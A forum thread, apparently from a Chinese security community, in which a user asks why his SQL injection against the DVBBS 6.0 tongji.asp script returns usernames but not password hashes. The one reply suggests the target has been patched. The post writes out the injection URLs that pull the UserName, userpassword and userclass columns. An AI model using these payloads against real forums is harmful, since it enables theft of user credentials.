论坛: 黑客进阶 标题: 请教动网论坛DVBBS6.0tongji.asp脚本漏洞功击...... 复制本贴地址    
作者: Henung [henung]    论坛用户   登录
我在测试动网论坛DVBBS 6.0的tongji.asp脚本漏洞功击时,为什么只可以查到用户,却查不到密码呢?

查用户的:http://192.168.130.134/tongji.asp?orders=2&N=2%20UserName?,(这个已经成功了,我已经查到了论坛上有什么用户)
http://192.168.130.134/tongji.asp?orders=2&N=2%20userpassword,?(这个搞不定啊,输进去以后和原来一样,只有用户,没有见到有MD5加密过的密码,(如果这个问题我搞不明白,我会睡不着的))
http://192.168.130.134/tongji.asp?orders=2&N=2%20userclass,(这个也是一样的结果,什么原因,为什么人家一搞就成功了呢,而我却不是)


地主 发表时间: 04-10-08 19:00

回复: saman [saman]   论坛用户   登录
打了补丁了贝

B1层 发表时间: 04-10-10 15:04

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号